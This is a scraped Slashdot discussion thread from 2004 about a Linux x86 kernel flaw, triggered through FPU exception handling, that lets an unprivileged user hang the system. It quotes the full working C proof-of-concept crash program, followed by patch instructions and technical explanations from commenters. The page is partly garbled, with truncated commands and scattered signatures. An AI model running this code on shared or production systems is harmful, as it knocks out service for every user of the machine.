New Linux Kernel Crash-Exploit discovered
Ant writes " According to linuxreviews article's on 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture. This exploit can be compiled and run without a root access and with a shell access. There are detailed information and source code mentioned. " You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read article for the full details.
RTFA! The bug only works on the x86 platform, so thus buying a mac and running Linux on it would get around the bug!
Parent might be a troll or flamebait, but not off-topic!
here's a direct link to the patch.
;)
not whoring.
... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.
Some questions I have to those who may have been following this:
Does the crash occur without the syscalls in the signal handler/main process?
Does the crash occur on SMP machines?
Does the crash occur with other signals (PIPE, USR1, etc.)
Does the crash occur on ppc, sparc, etc?
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
#include
./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels versions die when evil is executed.
/usr/src/ /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).
/usr/src/linux-2.4.26 2.4.26-rc3-gentoo.
/usr/src/ /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo" /usr/s
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil &&
The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x (vanilla) Kernels
Stian Skjelstad mailed me a working patch 2.4 kernels.
2.4.26
I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
5. Apply the patch
* patch -p1 -d
1. Get a vanilla 2.4.21 kernel and install it.
2. Apply the patch
* patch -p1 -d
I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any Gentoo-only tools.
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d
8. Configure your kernel
* Using your old config: cp
Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
The article says it affects x86 (and x86-64) only.
So itanium, ppc, etc. are safe. But my other questions still remain.
Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
This can be executed on any webhost with ftp access and a cgi-bin.
Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:
So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
Universities.
www.timcoleman.com is a total waste of your time. Never go there.
FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.
He, who dies with the most toys, wins
I have shell on my old dialup ISP's Sun machines, have for over a decade now. Many shared webhosting farms run on Linux on x86 and if you have CGI you basically have shell since you can run arbitrary code. Also any place that does development work under Unix probably gives their developers shell access (duh). So I would say there are a lot of places that give more than just the inner circle monks of IT shell access.
There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
That's right... they don't want to break the CometCursor, KaZaa, download managers, money savers, and other malware etc that are in the tray... then they wonder why their computers always crash and blame it on Microsoft.
I work as an IT Director for a real estate company and as a tech for Best Buy and at BB we've started a tally for the highest number of malware found by AdAware... I think the highest was well over 5000!!! Needless to say we recommended a restore O_o
-
From 0 to drunk in $20
Beware of patch.
It could be another Linux Kernel 2.4.11
The article doesn't attempt to explain anything.
(Someone please correct me if I have this wrong)
After poking around in the LKML, I've mostly figured it out.
The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the exception is attempted to be delivered to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a non-existant instruction. The exception handler would jump off into space trying to deliver SIGFPE...
So they changed __clear_fpu (which is called when doing a initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.
Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Yea, the only difference is that in OSS the steps are usually covered in about a third the time.
This hit the kernel-list dated 2004-06-09 21:02:57 . It is now 2004-06-14 09:41:12 in my neck of the woods, and it is patched. The last update mentioned on the article's page is yesterday. It would appear the patch was available in no more than 4 days. It takes more than four days for a lot of vendors just to look at the goddamn report. Then they spend the next week hoping it goes away on it's own. Then they ignore the follow ups. Two months later when the submitter has had enough, they go to FULL DISCLOSURE and the vendor gets pissed off and starts attacking the person who reported it for not giving them enough time to write a patch they haven't even started on. Then they spend another month making lousy excuses for why it's not a serious issue and half assed suggestions of what you can turn off to avoid the problem. Finally, after about four months of hand wringing, press releases, and general bullshit, you might get a patch. If you're lucky, it won't require you to start the process over again by introducing a brand new vulnerability. If you're lucky.
There's a huge difference here. The Linux folks jumped up and solved the problem. They didn't sit around pissing on their hands for months and making excuses like a lot of vendors do.
Alito: A vote for Alito is a punch in the eye to put that bitch back in her place!
In defence of the article "lame free-shell provider" is presented in quotes, it's not the website or the author using the term. It's a quote from the perpetrator. There's no connection to open source.
Talked about on the mailing lists.
1 08 695598318818&w=2
http://marc.theaimsgroup.com/?l=linux-kernel&m=
Says session just dies. Host is OK.
Yep, I never spell check.
More incorrect spellings can be found he
Doesn't crash my win2k pro box. I'm all for slagging off MS, but lets do it with real bugs eh?
"WHAT YOU SAY!?"
I run a corporate network without a firewall. Every time a major issue comes around and destroys every freaking company around me, I go by with maybe two systems effected. Why? I stay up-to-date on all patches, and I keep relatively SANE security policies in place.
A firewall is a lot less necessary than firewall vendors would have you believe. My experience is that firewalls breed a false sense of security. Someone goes home over the weekend with a laptop - and comes back with a zombie virus/worm/etc. that goes and infects everything while the IT department is "taking their time" evaluating a security update for a month (I do 24 hour tests).
Why not firewall, is the other thing I hear. Mostly, it's so that every one of my systems can be an internet service provider. That's what the internet is about. Enabling users to say, hey - I've got that file right here on my local FTP, come get it. Here, log onto my VNC desktop, and I'll show you.
Firewalls create industries like WebEx. Because technology has come from 'wow, I didn't know you could do that,' to, 'I didn't know you could do that because I'm firewalled.'
Finally, "It doesn't happen very often," quite clearly means that it has happened. Call it pre-teen style bitching if you will, but a lawsuit should have never been threatened (AFAIK, a lawsuit never actually went to court). Is someone finds a vulnerability, full disclosure should not be the only method to have Microsoft take you seriously. My teen years are LONG behind me, maybe I'm just sick of having to deal with Microsoft's crap since Windows for Workgroups 3.11 (when the problems started for me).
Kinetic stupidity has a new brand leader: Allen Zadr.
God I wish I could edit posts.
The issue isn't that the context is gone... the issue is that the kernel is executing a non-waiting FPU instruction i.e. "fwait" on returning from the a context that flushes a user thread (i.e. return from signal handler, syscall after execve). Triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.
What's really weird is I found this document, which details the potential problems of trying to use the FPU in a interrupt handler in the Linux kernel.
They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...
Well, you can't really call it that, though. It's was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
The thing about Windows bugs is that many of them are remotly exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.
--
I Hit the Karma Cap, and All I Got Was This Lousy
You are probably refusing "virus-infected" messages.
Here's how:
Add compiler group:
Move to correct directory:
Make most common compilers part of the compiler group
Set permissions
To add users to the group, modify and change to '123' will be different on your installation.
Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
"I filter at +6, and have yet to miss out on an important comment." (#822545)
Yeah, well, the so-called "tin-foil-hat crowd" has noticed the fact that autoupdate on windows XP is crap. Have you ever compared the list of updates it gets for you, to the list on the actual windows update site? I've had cases where there were 2-3 more critical updates that autoupdate didn't download.
/. (complete with people griping that the patch was out "months ago"). And then got the patch again every day for the next 4 days.
It also doesn't help that it won't autoupdate service packs, causing everything after the service pack to just not show up, without autoupdate even notifying you that there is a service pack to manually download and install.
And way back when the slammer worm was big news, autoupdate got the patch to me the week after it made
Tin foil and conspiracy theory has nothing to do with the fact that I no longer trust autoupdate.
Didn't work for me. I just get a white screen in the middle of the command prompt with a purple border that says in purple 0: PING 192.168.0.7. Pressing Enter runs ping a couple times.
I'm far from a Windows fanboy. I use Linux almost all the time... I just happened to have a Windows box on my network atm.
Look out!
Where does it say in the standard that you have to explicitly call EXIT_SUCCESS?
Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
*shrug*
Granted, this crashme program, which requires local shell access, does seem to work in some cases.
However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.
As for your Win2k 'sploit, I call bullcrap. Doesn't work, but a nice command history comes up, so I'll thank you for that tip.
Oh, and saying that local exploits aren't taken seriously is both a major understatement, and a not-so-major problem. After all, you can fix all the Denial-of-Service exploits you want, but if someone has local access to the machine, they can always pull out the power cord.
That is not easily fixed with an OS patch. Never underestimate the use of a heavy door and good locks.
Slashdot still doesnâ(TM)t support Unicode after it was added to the HTML standard in 1997.
help ulimit
Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.
Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.
11*43+456^2
My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.
11*43+456^2
http://linux.bkbits.net:8080/linux-2.5/diffs/inclu de/asm-i386/i387.h@1.16?nav=index.html|src/.|src/i nclude|src/include/asm-i386|hist/include/asm-i386/ i387.h
The name's grahamlee. I was using a word from the english language and taking it to mean that which is its accepted meaning. It's even written as such in the dictionaries.
That's a load of rubbish; all computers since the dawn of time have certainly not been exclusively von Neumann computers (as distinct from von Neumann machines, of course). Note all of the computers that employ the Harvard architecture. And I doubt you can conveniently ignore those unless you never ever intend to use a DSP (ever). The Harvard architecture is named after the Harvard Mark I (a.k.a. IBM ASCC), and one of its programmers was a certain Grace Hopper. She went on to big things, you know.
You mean Neumann János? [I'm not happy that a paid-for title should necessarily be honoured.] I wonder whether he was able to see the word 'nonzero' written down without trying to invent a new meaning for it....probably. Anyway, the achievements or otherwise of a Hungarian mathematician have little bearing on your version of the word nonzero's definition, which of course comes from the Old French / Latin prefix "non-" and the Arabic "çifr". Not that your definition isn't necessarily valid in some field, I'm sure it is. It's just that the previous (c. 1879) definition already has a lot of inertia everywhere else, because people know that that is what the word means.
That actualy doesn't work anymore... unless you haven't patched Win2k?
Also... that's a problem with printf() mainly... not windows.